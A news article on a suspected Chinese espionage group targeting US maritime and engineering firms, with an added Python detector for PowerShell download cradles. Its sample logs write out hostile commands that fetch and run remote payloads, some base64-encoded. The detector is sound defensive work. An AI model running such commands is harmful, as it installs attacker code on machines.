Maritime industries target of suspected Chinese cyber-espionage group

News by Robert Abel

The suspected Chinese cyber-espionage group dubbed "TEMP.Periscope" is targeting US engineering and maritime industries in its latest campaign.

The group, which other security firms have reported as “Leviathan”, has also targeted engineering-focused entities, including research institutes, academic organisations, and private firms in the United States, according to a 16 March FireEye blog post.

“The current campaign is a sharp escalation of detected activity since summer 2017,” researchers said in a 16 March blog post. “Like multiple other Chinese cyber-espionage actors, TEMP.Periscope has recently re-emerged and has been observed conducting operations with a revised toolkit.”

The group uses several tools, including a JavaScript-based backdoor named “AIRBREAK” that retrieves commands from hidden strings in compromised webpages and actor-controlled profiles on legitimate services, and a backdoor named “BADFLICK” that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration.

The group also leverages a 64-bit Windows password dumper/cracker dubbed “HOMEFRY”, which has previously been used in conjunction with the AIRBREAK and BADFLICK backdoors. Other tools include a DLL backdoor, an uploader that can exfiltrate files to Dropbox, and a simple code injection webshell.

Most of the group's victims were found in the United States, although organisations in Europe and at least one in Hong Kong have also been affected.

The attacks suggest the threat actors were looking for information that could provide an economic advantage, research and development data, intellectual property, or an edge in commercial negotiations.

Researchers said the threat group's targeting, tactics, and procedures overlap with those of TEMP.Jumper, a group that also overlaps significantly with public reporting on “NanHaiShu.”

The group also employs tactics such as spearphishing attacks, lure documents, stolen code signing certificates, and the use of PowerShell to download additional tools.
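Of the tactics listed above, the use of PowerShell to fetch additional tooling is the one a defender can hunt for directly in endpoint telemetry. The script below is an added example written for this page, not code from FireEye or from the article: it scans constructed PowerShell script-block log lines (the `host=... user=... ScriptBlockText=...` format and the sample entries are invented for the example) for common download cradles such as `Net.WebClient.DownloadString`, `Invoke-WebRequest -OutFile` and `Start-BitsTransfer`, and decodes `-EncodedCommand` arguments (base64 of UTF-16LE) so that a cradle hidden behind encoding is still caught. The patterns are generic detection heuristics, not indicators published for TEMP.Periscope.

```python
import base64
import re
from dataclasses import dataclass

# Generic detection patterns for PowerShell download cradles. These are
# heuristics written for this example, not indicators published for the
# campaign described in the article.
CRADLE_PATTERNS = [
    ("webclient_download", re.compile(r"\.(?:DownloadString|DownloadFile|DownloadData)\s*\(", re.I)),
    ("invoke_webrequest_to_disk", re.compile(r"\b(?:Invoke-WebRequest|iwr|curl|wget)\b.*-OutFile", re.I)),
    ("bits_transfer", re.compile(r"\bStart-BitsTransfer\b", re.I)),
    ("invoke_expression", re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I)),
]
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_FLAG = re.compile(r"(?<!\S)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Constructed log format for the example (loosely modelled on script-block
# logging, Event ID 4104); real telemetry will need its own parser.
LOG_LINE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) ScriptBlockText=(?P<script>.*)$")


@dataclass(frozen=True)
class Finding:
    timestamp: str
    host: str
    user: str
    rules: tuple
    script: str


def decode_encoded_command(b64: str) -> str:
    """Decode a -EncodedCommand argument (base64 of UTF-16LE); '' if it is not valid base64."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return ""


def scan_script_block(text: str, depth: int = 0) -> list:
    """Return the names of every rule the script block triggers.

    Encoded payloads are decoded and rescanned, with their hits prefixed
    'encoded:'; nesting is capped so a malformed chain cannot recurse forever.
    """
    hits = [name for name, pat in CRADLE_PATTERNS if pat.search(text)]
    for m in ENCODED_FLAG.finditer(text):
        decoded = decode_encoded_command(m.group(1))
        if not decoded:
            continue
        hits.append("encoded_command")
        if depth < 2:
            hits.extend("encoded:" + h for h in scan_script_block(decoded, depth + 1))
    return hits


def scan_logs(lines) -> list:
    """Parse each log line and return a Finding for every script block that matches a rule."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a script-block record; a real pipeline would count these
        rules = scan_script_block(m["script"])
        if rules:
            findings.append(Finding(m["ts"], m["host"], m["user"], tuple(rules), m["script"][:120]))
    return findings


# Constructed sample data: a stage-two cradle, once in the clear and once
# base64/UTF-16LE encoded the way `powershell -enc` expects it.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/stage2.ps1')"
ENCODED_STAGE2 = base64.b64encode(STAGE2.encode("utf-16le")).decode("ascii")

SAMPLE_LOG_LINES = [
    "2018-03-16T10:01:22Z host=WS-ENG-07 user=jdoe ScriptBlockText=Get-ChildItem C:\\Projects",
    "2018-03-16T10:02:05Z host=WS-ENG-07 user=jdoe ScriptBlockText=" + STAGE2,
    "2018-03-16T10:02:40Z host=WS-ENG-07 user=jdoe ScriptBlockText=powershell -nop -w hidden -enc " + ENCODED_STAGE2,
    "2018-03-16T10:03:10Z host=WS-ENG-07 user=jdoe ScriptBlockText=Invoke-WebRequest -Uri https://198.51.100.23/tool.exe -OutFile C:\\Users\\Public\\svchost.exe",
    "2018-03-16T10:04:00Z host=WS-ENG-07 user=jdoe ScriptBlockText=Start-BitsTransfer -Source http://198.51.100.23/x.dll -Destination C:\\Windows\\Temp\\x.dll",
    "2018-03-16T10:05:00Z host=WS-ENG-07 user=jdoe ScriptBlockText=Get-Process | Sort-Object CPU",
]

if __name__ == "__main__":
    for f in scan_logs(SAMPLE_LOG_LINES):
        print(f"{f.timestamp} {f.host} {f.user} {','.join(f.rules)} :: {f.script}")
```

The encoded case is the one worth keeping: a rule that only looks at the raw command line would see nothing suspicious in `powershell -nop -w hidden -enc ...`, while decoding the argument exposes the same `DownloadString` cradle as the plaintext line. In production, pair this with script-block logging (which records the decoded script anyway) and tune the `invoke_expression` rule, which on its own is noisy in environments that use legitimate administration scripts.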

Fred Plan, senior analyst at FireEye, told SC Media the organisations targeted by the group have a connection to the ongoing disputes in the South China Sea.

“They or their customers are involved in military and defence, or the shipping business, or they are developing technologies that would be advantageous to the defence industry or governments in the region,” Plan said. “Because of the group's tendency to target engineering organisations we believe the group is seeking technical data that can help inform strategic decision-making.”

He added that, hypothetically, this could be used to understand the range and effectiveness of a marine radar system, or “how precisely a system can detect and identify activities at sea.”
